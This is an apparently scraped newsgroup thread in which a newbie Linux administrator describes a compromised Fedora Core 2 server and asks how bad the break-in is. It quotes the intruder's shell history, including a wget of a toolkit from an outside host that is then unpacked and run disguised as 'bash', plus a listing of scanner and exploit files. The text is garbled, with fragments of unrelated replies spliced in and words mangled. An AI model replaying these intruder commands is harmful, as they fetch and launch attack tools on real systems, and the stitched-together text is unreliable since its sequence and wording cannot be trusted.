need help with root hack
... I think that's what happened. Pretty sure. I'm pretty newbie with Linux security, but the following seems pretty obvious to me. I guess I could use some suggestions regarding how serious this is, if it can be fixed-repaired-closed, and ideas of what may have been done. How the heck did it happen? What can I do to prevent it? And if I were running Slackware 10.2, would this have been less likely to happen?
Anyway, I'm running Redora Core 2, and I found an odd entry in my cron log: Apr 18 09:35:59 fileserve CROND13807: (testuser) CMD (--tmp-. Apr 18 09:36:09 fileserve CROND13806: (testuser) MAIL (mailed 47 bytes of output but got status 0x0046 )
So I looked into thehome-testuser and found .bashhistory:
Maybe you've got a specially built Linux installation where pbuttwd(8) is a statically linked binary that just makes kernel calls. On my systems, pbuttwd is built...
ls wc -l uniq.txt ls .-eigei 100 & ps -x ls exit ps -x exit w ps -x cd-tmp-." ";ls -af cd w00t;ls cat vuln.txt wc -l vuln.txt ps -x exit w ps -x cd-tmp-." "-woot;ls cd-tmp-." "-w00t;ls cat vuln.txt mv 0 pscan2;ls wc -l uniq.txt .-eigei 100 & exit w ps -x cat-tmp-." "-w00t-vuln.txt ls-tmp-." "-w00t exit w ps x kill -9 31257 31256 pbuttwd sbin-ifconfig grep inet catproc-cpuinfo w uname -a w ps x catproc-cpuinfo w ps x catproc-cpuinfo w ps x catproc-cpuinfo ls -a cdvar-tmp ls -a mkdir ." " cd ." " ls -a tar zxvf omar.tar.gz rm -rf omar.tar.gz cd .f mv x bash export PATH="." bash w ps x ls -a catproc-cpuinfo ls - a ls -a cdvar-tmp ls -a cd ." " ls -a cd .f ls -a export PATH="." bash w ps x catproc-cpuinfo w ps x cdvar-tmp ls -a cd ." " ls -a catetc-hosts catproc-cpuinfo ls-a cd .f ls -a export PATH="." bash w ps x cdvart-emp ls -acdvar-tmp ls -a cdvar-tmp ls -a catetc-hosts ls -a rm -rf ." " sbin-ifconfig -a grep inet catproc-cpuinfo ls- a ls- a wget archive.lydo.org-omar1.tgz tar zxvf omar1.tgz rm -rf omar1.tgz cd .f mv x bash .-bash ps x kill -9 2591 export PATH="." bash
And a bunch of stuff above that with various text files. So I looked attmp and found a second "." directory.tmp-. w00t
I recently just had a FC2 box hacked. Unfortunately we simply can't take it offline at the moment because we have outside people needing to use files on...
Unruh OK, so I run that RPM verification and get results like: S.5....T cusr-share-sgml-docbook-xmlcatalog SM5....T...
Bit Twister Well, let me put it this way: I can't build a new system until I get a new HD...
and in there is: total 11752 drwxr-xr-x 2 523 525 12288 Dec 16 06:26 . drwxrwxr-x 3 523 525 4096 Dec 13 11:06 .. -rwxr-xr-x 1 523 525 813 Apr 22 2003 asmb -rwxr-xr-x 1 523 525 206 Apr 17 2003 auto -rwxr-xr-x 1 523 525 1372782 Feb 22 2005 eigei -rw-r--r-- 1 523 525 1382400 Feb 22 2005 eigei.tar -rwxrwxr-x 1 523 525 10677 Dec 13 11:11 http -rw-rw-r-- 1 523 525 6132405 Dec 16 18:58 log.bigsshf -rwxr-xr-x 1 523 525 121 Apr 21 2003 make -rwxr-xr-x 1 523 525 12736 Apr 21 2003 o0o -rw-r--r-- 1 523 525 885 Apr 18 2003 o0o.c -rwxr-xr-x 1 523 525 16039 Apr 21 2003 pscan2 -rw-r--r-- 1 523 525 5767 Apr 21 2003 pscan2.c -rwxr-xr-x 1 523 525 30581 Apr 21 2003 samba -rw-r--r-- 1 523 525 42762 Apr 21 2003 samba.c -rwxr-xr-x 1 523 525 30710 Apr 21 2003 sambas -rw-r--r-- 1 523 525 42930 Apr 21 2003 sambas.c -rwxr-xr-x 1 523 525 1202824 Jan 30 2005 ssh3 -rwxr-xr-x 1 523 525 12134 Apr 21 2003 try -rw-r--r-- 1 523 525 396 Apr 21 2003 try.c -rw-rw-r-- 1 523 525 1609007 Dec 15 16:51 uniq.txt -rwxr-xr-x 1 523 525 17833 Apr 21 2003 vuln -rw-r--r-- 1 523 525 13516 Apr 21 2003 vuln.c
I removed the user "testuser", and I'm about to remove this dir. But I guess I kind of need to know how bad the damage is. Were they able to get root access? Do they likely know all the pbuttwords? Would changing the pbuttwords even work, or do they likely have some kind of keylogger installed?
Any ideas? This is completely new to me. Thanks! -Liam
changing root pbuttword with Knoppix
Linux groups from Newsgroups